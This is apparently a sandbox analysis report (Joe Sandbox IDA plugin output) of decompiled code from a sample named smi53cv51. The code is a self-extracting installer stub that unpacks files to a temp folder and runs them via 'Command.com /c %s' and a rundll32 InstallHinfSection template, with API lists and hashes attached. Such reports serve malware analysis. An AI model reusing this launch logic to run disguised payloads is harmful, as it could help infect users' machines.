                                                                                                                                                                                                      								 *_t156 = 0;
                                                                                                                                                                                                      								E00A62AAC( &_v1552, _t156, _t156);
                                                                                                                                                                                                      								goto L53;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t108 = "Command.com /c %s";
                                                                                                                                                                                                      								_t125 = "Command.com /c %s";
                                                                                                                                                                                                      								_t145 = _t125 + 1;
                                                                                                                                                                                                      								do {
                                                                                                                                                                                                      									_t76 =  *_t125;
                                                                                                                                                                                                      									_t125 = _t125 + 1;
                                                                                                                                                                                                      								} while (_t76 != 0);
                                                                                                                                                                                                      								_t126 = _t125 - _t145;
                                                                                                                                                                                                      								_t146 =  &_v268;
                                                                                                                                                                                                      								_t157 = _t146 + 1;
                                                                                                                                                                                                      								do {
                                                                                                                                                                                                      									_t77 =  *_t146;
                                                                                                                                                                                                      									_t146 = _t146 + 1;
                                                                                                                                                                                                      								} while (_t77 != 0);
                                                                                                                                                                                                      								_t140 = _t146 - _t157;
                                                                                                                                                                                                      								_t154 = _t126 + 8 + _t146 - _t157;
                                                                                                                                                                                                      								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                                                                                                                                                                      								if(_t156 != 0) {
                                                                                                                                                                                                      									E00A6171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                                                                                                                                                                      									goto L53;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								goto L43;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t85 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                      							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                                                                                                                                                                      								_t140 = 0x525;
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								_push(0x10);
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								_t60 =  &_v268;
                                                                                                                                                                                                      								goto L35;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t140 = "[";
                                                                                                                                                                                                      								_v1556 = _t151;
                                                                                                                                                                                                      								_t90 = E00A61A84( &_v1556, "[");
                                                                                                                                                                                                      								if(_t90 != 0) {
                                                                                                                                                                                                      									if( *_t90 != 0) {
                                                                                                                                                                                                      										_v1556 = _t90;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t140 = "]";
                                                                                                                                                                                                      									E00A61A84( &_v1556, "]");
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t156 = LocalAlloc(0x40, 0x200);
                                                                                                                                                                                                      								if(_t156 == 0) {
                                                                                                                                                                                                      									L43:
                                                                                                                                                                                                      									_t60 = 0;
                                                                                                                                                                                                      									_t140 = 0x4b5;
                                                                                                                                                                                                      									_push(0);
                                                                                                                                                                                                      									_push(0x10);
                                                                                                                                                                                                      									_push(0);
                                                                                                                                                                                                      									L35:
                                                                                                                                                                                                      									_push(_t60);
                                                                                                                                                                                                      									E00A644B9(0, _t140);
                                                                                                                                                                                                      									_t62 = 0;
                                                                                                                                                                                                      									goto L54;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t155 = _v1556;
                                                                                                                                                                                                      									_t92 = _t155;
                                                                                                                                                                                                      									if( *_t155 == 0) {
                                                                                                                                                                                                      										_t92 = "DefaultInstall";
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									 *0xa69120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                                                                                                                                                      									 *_v1560 = 1;
                                                                                                                                                                                                      									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0xa61140, _t156, 8,  &_v268) == 0) {
                                                                                                                                                                                                      										 *0xa69a34 =  *0xa69a34 & 0xfffffffb;
                                                                                                                                                                                                      										if( *0xa69a40 != 0) {
                                                                                                                                                                                                      											_t108 = "setupapi.dll";
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											_t108 = "setupx.dll";
                                                                                                                                                                                                      											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										if( *_t155 == 0) {
                                                                                                                                                                                                      											_t155 = "DefaultInstall";
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_push( &_v268);
                                                                                                                                                                                                      										_push(_t155);
                                                                                                                                                                                                      										E00A6171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										 *0xa69a34 =  *0xa69a34 | 0x00000004;
                                                                                                                                                                                                      										if( *_t155 == 0) {
                                                                                                                                                                                                      											_t155 = "DefaultInstall";
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										E00A61680(_t108, 0x104, _t155);
                                                                                                                                                                                                      										_t140 = 0x200;
                                                                                                                                                                                                      										E00A61680(_t156, 0x200,  &_v268);
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									L53:
                                                                                                                                                                                                      									_t62 = 1;
                                                                                                                                                                                                      									 *_v1564 = _t156;
                                                                                                                                                                                                      									L54:
                                                                                                                                                                                                      									_pop(_t152);
                                                                                                                                                                                                      									return E00A66CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}














































                                                                                                                                                                                                      0x00a61b52
                                                                                                                                                                                                      0x00a61b57
                                                                                                                                                                                                      0x00a61b5d
                                                                                                                                                                                                      0x00a61b61
                                                                                                                                                                                                      0x00a61b9f
                                                                                                                                                                                                      0x00a61b9f
                                                                                                                                                                                                      0x00a61bb1
                                                                                                                                                                                                      0x00a61bc2
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a61b63
                                                                                                                                                                                                      0x00a61b63
                                                                                                                                                                                                      0x00a61b65
                                                                                                                                                                                                      0x00a61b68
                                                                                                                                                                                                      0x00a61b68
                                                                                                                                                                                                      0x00a61b6a
                                                                                                                                                                                                      0x00a61b6b
                                                                                                                                                                                                      0x00a61b6f
                                                                                                                                                                                                      0x00a61b74
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a61b76
                                                                                                                                                                                                      0x00a61b7b
                                                                                                                                                                                                      0x00a61b86
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a61b8c
                                                                                                                                                                                                      0x00a61b8c
                                                                                                                                                                                                      0x00a61b98
                                                                                                                                                                                                      0x00a61bc7
                                                                                                                                                                                                      0x00a61bc9
                                                                                                                                                                                                      0x00a61bcc
                                                                                                                                                                                                      0x00a61bd3
                                                                                                                                                                                                      0x00a61d75
                                                                                                                                                                                                      0x00a61d76
                                                                                                                                                                                                      0x00a61d78
                                                                                                                                                                                                      0x00a61d7f
                                                                                                                                                                                                      0x00a61e05
                                                                                                                                                                                                      0x00a61e09
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a61e12
                                                                                                                                                                                                      0x00a61e1b
                                                                                                                                                                                                      0x00a61e73
                                                                                                                                                                                                      0x00a61e21
                                                                                                                                                                                                      0x00a61e21
                                                                                                                                                                                                      0x00a61e28
                                                                                                                                                                                                      0x00a61e37
                                                                                                                                                                                                      0x00a61e3e
                                                                                                                                                                                                      0x00a61e52
                                                                                                                                                                                                      0x00a61e60
                                                                                                                                                                                                      0x00a61e60
                                                                                                                                                                                                      0x00a61e3e
                                                                                                                                                                                                      0x00a61e79
                                                                                                                                                                                                      0x00a61e7b
                                                                                                                                                                                                      0x00a61e84
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a61d9b
                                                                                                                                                                                                      0x00a61d9b
                                                                                                                                                                                                      0x00a61da0
                                                                                                                                                                                                      0x00a61da2
                                                                                                                                                                                                      0x00a61da5
                                                                                                                                                                                                      0x00a61da5
                                                                                                                                                                                                      0x00a61da7
                                                                                                                                                                                                      0x00a61da8
                                                                                                                                                                                                      0x00a61dac
                                                                                                                                                                                                      0x00a61dae
                                                                                                                                                                                                      0x00a61db4
                                                                                                                                                                                                      0x00a61db7
                                                                                                                                                                                                      0x00a61db7
                                                                                                                                                                                                      0x00a61db9
                                                                                                                                                                                                      0x00a61dba
                                                                                                                                                                                                      0x00a61dbe
                                                                                                                                                                                                      0x00a61dc3
                                                                                                                                                                                                      0x00a61dce
                                                                                                                                                                                                      0x00a61dd2
                                                                                                                                                                                                      0x00a61deb
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a61df0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a61dd2
                                                                                                                                                                                                      0x00a61bf7
                                                                                                                                                                                                      0x00a61bfe
                                                                                                                                                                                                      0x00a61c07
                                                                                                                                                                                                      0x00a61d55
                                                                                                                                                                                                      0x00a61d5a
                                                                                                                                                                                                      0x00a61d5b
                                                                                                                                                                                                      0x00a61d5d
                                                                                                                                                                                                      0x00a61d5e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a61c1b
                                                                                                                                                                                                      0x00a61c1b
                                                                                                                                                                                                      0x00a61c20
                                                                                                                                                                                                      0x00a61c2c
                                                                                                                                                                                                      0x00a61c33
                                                                                                                                                                                                      0x00a61c38
                                                                                                                                                                                                      0x00a61c3a
                                                                                                                                                                                                      0x00a61c3a
                                                                                                                                                                                                      0x00a61c40
                                                                                                                                                                                                      0x00a61c4b
                                                                                                                                                                                                      0x00a61c4b
                                                                                                                                                                                                      0x00a61c5d
                                                                                                                                                                                                      0x00a61c61
                                                                                                                                                                                                      0x00a61dd4
                                                                                                                                                                                                      0x00a61dd4
                                                                                                                                                                                                      0x00a61dd6
                                                                                                                                                                                                      0x00a61ddb
                                                                                                                                                                                                      0x00a61ddc
                                                                                                                                                                                                      0x00a61dde
                                                                                                                                                                                                      0x00a61d64
                                                                                                                                                                                                      0x00a61d64
                                                                                                                                                                                                      0x00a61d67
                                                                                                                                                                                                      0x00a61d6c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a61c67
                                                                                                                                                                                                      0x00a61c67
                                                                                                                                                                                                      0x00a61c6d
                                                                                                                                                                                                      0x00a61c72
                                                                                                                                                                                                      0x00a61c74
                                                                                                                                                                                                      0x00a61c74
                                                                                                                                                                                                      0x00a61c8e
                                                                                                                                                                                                      0x00a61c99
                                                                                                                                                                                                      0x00a61cc0
                                                                                                                                                                                                      0x00a61cf8
                                                                                                                                                                                                      0x00a61d07
                                                                                                                                                                                                      0x00a61d23
                                                                                                                                                                                                      0x00a61d09
                                                                                                                                                                                                      0x00a61d14
                                                                                                                                                                                                      0x00a61d1b
                                                                                                                                                                                                      0x00a61d1b
                                                                                                                                                                                                      0x00a61d2b
                                                                                                                                                                                                      0x00a61d2d
                                                                                                                                                                                                      0x00a61d2d

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,?,00000000,00000001,00000000), ref: 00A61BE7
                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,?,00000000,00000001,00000000), ref: 00A61BFE
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,?,00000000,00000001,00000000), ref: 00A61C57
                                                                                                                                                                                                      • GetPrivateProfileIntA.KERNEL32 ref: 00A61C88
                                                                                                                                                                                                      • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00A61140,00000000,00000008,?), ref: 00A61CB8
                                                                                                                                                                                                      • GetShortPathNameA.KERNEL32 ref: 00A61D1B
                                                                                                                                                                                                        • Part of subcall function 00A644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A64518
                                                                                                                                                                                                        • Part of subcall function 00A644B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00A64554
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                      • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                      • API String ID: 383838535-506080820
                                                                                                                                                                                                      • Opcode ID: 88683c0d92f60d10608277aa14c45cfb612ac87e288dcf57003169dd9f6e03fb
                                                                                                                                                                                                      • Instruction ID: 950c338784e272525515edf3412edf8d19f8363e87bc231c74a971566a2c2eb7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 88683c0d92f60d10608277aa14c45cfb612ac87e288dcf57003169dd9f6e03fb
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 88A14CB0A002186BEB20DB24CC45FEA7FB9EB52310F1C4799E555E32D1DBB19D86CB50
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 406 a62f1d-a62f3d 407 a62f3f-a62f46 406->407 408 a62f6c-a62f73 call a65164 406->408 410 a62f5f-a62f66 call a63a3f 407->410 411 a62f48 call a651e5 407->411 415 a63041 408->415 416 a62f79-a62f80 call a655a0 408->416 410->408 410->415 417 a62f4d-a62f4f 411->417 420 a63043-a63053 call a66ce0 415->420 416->415 424 a62f86-a62fbe GetSystemDirectoryA call a6658a LoadLibraryA 416->424 417->415 421 a62f55-a62f5d 417->421 421->408 421->410 428 a62ff7-a63004 FreeLibrary 424->428 429 a62fc0-a62fd4 GetProcAddress 424->429 431 a63006-a6300c 428->431 432 a63017-a63024 SetCurrentDirectoryA 428->432 429->428 430 a62fd6-a62fee DecryptFileA 429->430 430->428 445 a62ff0-a62ff5 430->445 431->432 433 a6300e call a6621e 431->433 434 a63026-a6303c call a644b9 call a66285 432->434 435 a63054-a6305a 432->435 441 a63013-a63015 433->441 434->415 439 a63065-a6306c 435->439 440 a6305c call a63b26 435->440 442 a6306e-a63075 call a6256d 439->442 443 a6307c-a63089 439->443 447 a63061-a63063 440->447 441->415 441->432 452 a6307a 442->452 449 a630a1-a630a9 443->449 450 a6308b-a63091 443->450 445->428 447->415 447->439 455 a630b4-a630b7 449->455 456 a630ab-a630ad 449->456 450->449 453 a63093 call a63ba2 450->453 452->443 459 a63098-a6309a 453->459 455->420 456->455 458 a630af call a64169 456->458 458->455 459->415 461 a6309c 459->461 461->449
                                                                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                                                                      			E00A62F1D(void* __ecx, int __edx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v272;
                                                                                                                                                                                                      				_Unknown_base(*)()* _v276;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t9;
                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                      				struct HWND__* _t12;
                                                                                                                                                                                                      				void* _t14;
                                                                                                                                                                                                      				int _t21;
                                                                                                                                                                                                      				signed int _t22;
                                                                                                                                                                                                      				signed int _t25;
                                                                                                                                                                                                      				intOrPtr* _t26;
                                                                                                                                                                                                      				signed int _t27;
                                                                                                                                                                                                      				void* _t30;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t31;
                                                                                                                                                                                                      				void* _t34;
                                                                                                                                                                                                      				struct HINSTANCE__* _t36;
                                                                                                                                                                                                      				intOrPtr _t41;
                                                                                                                                                                                                      				intOrPtr* _t44;
                                                                                                                                                                                                      				signed int _t46;
                                                                                                                                                                                                      				int _t47;
                                                                                                                                                                                                      				void* _t58;
                                                                                                                                                                                                      				void* _t59;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t43 = __edx;
                                                                                                                                                                                                      				_t9 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_v8 = _t9 ^ _t46;
                                                                                                                                                                                                      				if( *0xa68a38 != 0) {
                                                                                                                                                                                                      					L5:
                                                                                                                                                                                                      					_t11 = E00A65164(_t52);
                                                                                                                                                                                                      					_t53 = _t11;
                                                                                                                                                                                                      					if(_t11 == 0) {
                                                                                                                                                                                                      						L16:
                                                                                                                                                                                                      						_t12 = 0;
                                                                                                                                                                                                      						L17:
                                                                                                                                                                                                      						return E00A66CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t14 = E00A655A0(_t53); // executed
                                                                                                                                                                                                      					if(_t14 == 0) {
                                                                                                                                                                                                      						goto L16;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t45 = 0x105;
                                                                                                                                                                                                      						GetSystemDirectoryA( &_v272, 0x105);
                                                                                                                                                                                                      						_t43 = 0x105;
                                                                                                                                                                                                      						_t40 =  &_v272;
                                                                                                                                                                                                      						E00A6658A( &_v272, 0x105, "advapi32.dll");
                                                                                                                                                                                                      						_t36 = LoadLibraryA( &_v272);
                                                                                                                                                                                                      						_t44 = 0;
                                                                                                                                                                                                      						if(_t36 != 0) {
                                                                                                                                                                                                      							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                                                                                                                                                      							_v276 = _t31;
                                                                                                                                                                                                      							if(_t31 != 0) {
                                                                                                                                                                                                      								_t45 = _t47;
                                                                                                                                                                                                      								_t40 = _t31;
                                                                                                                                                                                                      								 *0xa6a288("C:\Users\alfons\AppData\Local\Temp\IXP003.TMP\", 0); // executed
                                                                                                                                                                                                      								_v276();
                                                                                                                                                                                                      								if(_t47 != _t47) {
                                                                                                                                                                                                      									_t40 = 4;
                                                                                                                                                                                                      									asm("int 0x29");
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						FreeLibrary(_t36);
                                                                                                                                                                                                      						_t58 =  *0xa68a24 - _t44; // 0x0
                                                                                                                                                                                                      						if(_t58 != 0) {
                                                                                                                                                                                                      							L14:
                                                                                                                                                                                                      							_t21 = SetCurrentDirectoryA("C:\Users\alfons\AppData\Local\Temp\IXP003.TMP\"); // executed
                                                                                                                                                                                                      							if(_t21 != 0) {
                                                                                                                                                                                                      								__eflags =  *0xa68a2c - _t44; // 0x0
                                                                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                                                                      									L20:
                                                                                                                                                                                                      									__eflags =  *0xa68d48 & 0x000000c0;
                                                                                                                                                                                                      									if(( *0xa68d48 & 0x000000c0) == 0) {
                                                                                                                                                                                                      										_t41 =  *0xa69a40; // 0x3, executed
                                                                                                                                                                                                      										_t26 = E00A6256D(_t41); // executed
                                                                                                                                                                                                      										_t44 = _t26;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t22 =  *0xa68a24; // 0x0
                                                                                                                                                                                                      									 *0xa69a44 = _t44;
                                                                                                                                                                                                      									__eflags = _t22;
                                                                                                                                                                                                      									if(_t22 != 0) {
                                                                                                                                                                                                      										L26:
                                                                                                                                                                                                      										__eflags =  *0xa68a38;
                                                                                                                                                                                                      										if( *0xa68a38 == 0) {
                                                                                                                                                                                                      											__eflags = _t22;
                                                                                                                                                                                                      											if(__eflags == 0) {
                                                                                                                                                                                                      												E00A64169(__eflags);
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_t12 = 1;
                                                                                                                                                                                                      										goto L17;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										__eflags =  *0xa69a30 - _t22; // 0x0
                                                                                                                                                                                                      										if(__eflags != 0) {
                                                                                                                                                                                                      											goto L26;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_t25 = E00A63BA2(); // executed
                                                                                                                                                                                                      										__eflags = _t25;
                                                                                                                                                                                                      										if(_t25 == 0) {
                                                                                                                                                                                                      											goto L16;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_t22 =  *0xa68a24; // 0x0
                                                                                                                                                                                                      										goto L26;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t27 = E00A63B26(_t40, _t44);
                                                                                                                                                                                                      								__eflags = _t27;
                                                                                                                                                                                                      								if(_t27 == 0) {
                                                                                                                                                                                                      									goto L16;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								goto L20;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t43 = 0x4bc;
                                                                                                                                                                                                      							E00A644B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                                                                                                                                                      							 *0xa69124 = E00A66285();
                                                                                                                                                                                                      							goto L16;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t59 =  *0xa69a30 - _t44; // 0x0
                                                                                                                                                                                                      						if(_t59 != 0) {
                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t30 = E00A6621E(); // executed
                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                      							goto L16;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						goto L14;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t49 =  *0xa68a24;
                                                                                                                                                                                                      				if( *0xa68a24 != 0) {
                                                                                                                                                                                                      					L4:
                                                                                                                                                                                                      					_t34 = E00A63A3F(_t51);
                                                                                                                                                                                                      					_t52 = _t34;
                                                                                                                                                                                                      					if(_t34 == 0) {
                                                                                                                                                                                                      						goto L16;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L5;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(E00A651E5(_t49) == 0) {
                                                                                                                                                                                                      					goto L16;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t51 =  *0xa68a38;
                                                                                                                                                                                                      				if( *0xa68a38 != 0) {
                                                                                                                                                                                                      					goto L5;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				goto L4;
                                                                                                                                                                                                      			}




























                                                                                                                                                                                                      0x00a6300e
                                                                                                                                                                                                      0x00a63015
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63015
                                                                                                                                                                                                      0x00a62f80
                                                                                                                                                                                                      0x00a62f3f
                                                                                                                                                                                                      0x00a62f46
                                                                                                                                                                                                      0x00a62f5f
                                                                                                                                                                                                      0x00a62f5f
                                                                                                                                                                                                      0x00a62f64
                                                                                                                                                                                                      0x00a62f66
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a62f66
                                                                                                                                                                                                      0x00a62f4f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a62f55
                                                                                                                                                                                                      0x00a62f5d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32 ref: 00A62F93
                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00A62FB2
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00A62FC6
                                                                                                                                                                                                      • DecryptFileA.ADVAPI32 ref: 00A62FE6
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00A62FF8
                                                                                                                                                                                                      • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 00A6301C
                                                                                                                                                                                                        • Part of subcall function 00A651E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00A62F4D,?,00000002,00000000), ref: 00A65201
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                      • API String ID: 2126469477-1932822326
                                                                                                                                                                                                      • Opcode ID: 81df6a23e1999531234ed9fab3fba1b3e8c3ac2a48d7cd915ad735a1262608f6
                                                                                                                                                                                                      • Instruction ID: 41a397875d99030d4c75eda82c9faaf343c84cd2f314206e077a2e84ce5e0407
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 81df6a23e1999531234ed9fab3fba1b3e8c3ac2a48d7cd915ad735a1262608f6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A841B632A00605AADF30EBF19D4576633BCDB64790F160265E941D21D2EFB4CE87CA61
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      C-Code - Quality: 86%
                                                                                                                                                                                                      			E00A62390(CHAR* __ecx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v276;
                                                                                                                                                                                                      				char _v280;
                                                                                                                                                                                                      				char _v284;
                                                                                                                                                                                                      				struct _WIN32_FIND_DATAA _v596;
                                                                                                                                                                                                      				struct _WIN32_FIND_DATAA _v604;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t21;
                                                                                                                                                                                                      				int _t36;
                                                                                                                                                                                                      				void* _t46;
                                                                                                                                                                                                      				void* _t62;
                                                                                                                                                                                                      				void* _t63;
                                                                                                                                                                                                      				CHAR* _t65;
                                                                                                                                                                                                      				void* _t66;
                                                                                                                                                                                                      				signed int _t67;
                                                                                                                                                                                                      				signed int _t69;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                                                                                                                                                      				_t21 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_t22 = _t21 ^ _t69;
                                                                                                                                                                                                      				_v8 = _t21 ^ _t69;
                                                                                                                                                                                                      				_t65 = __ecx;
                                                                                                                                                                                                      				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                                                                                                                                                      					L10:
                                                                                                                                                                                                      					_pop(_t62);
                                                                                                                                                                                                      					_pop(_t66);
                                                                                                                                                                                                      					_pop(_t46);
                                                                                                                                                                                                      					return E00A66CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					E00A61680( &_v276, 0x104, __ecx);
                                                                                                                                                                                                      					_t58 = 0x104;
                                                                                                                                                                                                      					E00A616B3( &_v280, 0x104, "*");
                                                                                                                                                                                                      					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                                                                                                                                                      					_t63 = _t22;
                                                                                                                                                                                                      					if(_t63 == 0xffffffff) {
                                                                                                                                                                                                      						goto L10;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						goto L3;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					do {
                                                                                                                                                                                                      						L3:
                                                                                                                                                                                                      						_t58 = 0x104;
                                                                                                                                                                                                      						E00A61680( &_v276, 0x104, _t65);
                                                                                                                                                                                                      						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                                                                                                                                                      							_t58 = 0x104;
                                                                                                                                                                                                      							E00A616B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                                                                                                                                                      							SetFileAttributesA( &_v280, 0x80);
